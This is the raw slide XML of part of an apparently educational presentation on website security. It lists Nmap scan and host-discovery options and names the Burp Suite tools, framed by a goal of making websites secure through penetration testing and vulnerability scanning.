              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t> -sS//sT/sA/sW: TCP SYN/CONNECT()/ACK/Window</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-289242" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>-sU: UDP Scan</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-289242" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>-sO: IP Protocol Scan </a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-289242" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Host Discovery</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-289242" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-sL: small List target to Scan</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-289242" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-sn: Disable Port Scan</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-289242" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-PS/PA: TCP Syn/ACK discovery to given ports</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-289242" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-PU: UDP discovery to given ports</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-289242" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-PE: ICMP Echo request discovery probe</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-289242" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-PO: IP Protocol Ping </a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-289242" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-PN: No Ping</a:t>
            </a:r>
            <a:endParaRPr sz="230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282"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="378143" y="138113"/>
            <a:ext cx="8709000" cy="42261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2100"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100" b="1"/>
              <a:t>BRUPSUITE TOOLS -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>1. SPIDER:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>2. PROXY:  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>3. INTRUDER:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>4. REPEATER:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>5. SEQUENCER:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>6. DECODER</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>7. SCANNER:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1942" name="Google Shape;1942;p282"/>
          <p:cNvPicPr preferRelativeResize="0">
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3648551" y="842010"/>
            <a:ext cx="5028900" cy="2720400"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="1947" name="Google Shape;1947;p283"/>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Clr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>PROBLEM STATEMENT</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1948" name="Google Shape;1948;p283"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6179260" y="17145"/>
            <a:ext cx="2947593" cy="623932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1949" name="Google Shape;1949;p283"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="60008" y="1090136"/>
            <a:ext cx="5226300" cy="3788700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Approximately, 175 new websites are created every minute. So, around 252,000 new websites are created every day worldwide.</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Goal : To make all the websites fully secured.</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Many websites are hacked, causing losses for individuals and companies.</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Burp suite consists of a set of tools used for penetration testing of websites and application</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"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chemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1950" name="Google Shape;1950;p283"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4074122" y="4785315"/>
            <a:ext cx="1135800" cy="369300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>PART 1</a:t>
            </a:r>
            <a:endParaRPr sz="2700" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1951" name="Google Shape;1951;p283"/>
          <p:cNvPicPr preferRelativeResize="0">
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="5749"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5461150" y="1022374"/>
            <a:ext cx="3490500" cy="3567600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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sp>
        <p:nvSpPr>
          <p:cNvPr id="1956" name="Google Shape;1956;p284"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="282892" y="140018"/>
            <a:ext cx="4289100" cy="501600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>SOCIAL WELFARE BENEFITS</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1957" name="Google Shape;1957;p284"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6179260" y="17145"/>
            <a:ext cx="2947593" cy="623932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1958" name="Google Shape;1958;p284"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="212884" y="914876"/>
            <a:ext cx="8452500" cy="2904900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="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Penetration testing of web applications</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="80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Web vulnerability scanning</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="80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Customized scan and attack applications</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="80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Acts as an amazing proxy service: BurpSuite helps you proxy all the web-based requests which can even be modified when sent or received.</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1959" name="Google Shape;1959;p284"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4074122" y="4785315"/>
            <a:ext cx="1135800" cy="369300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
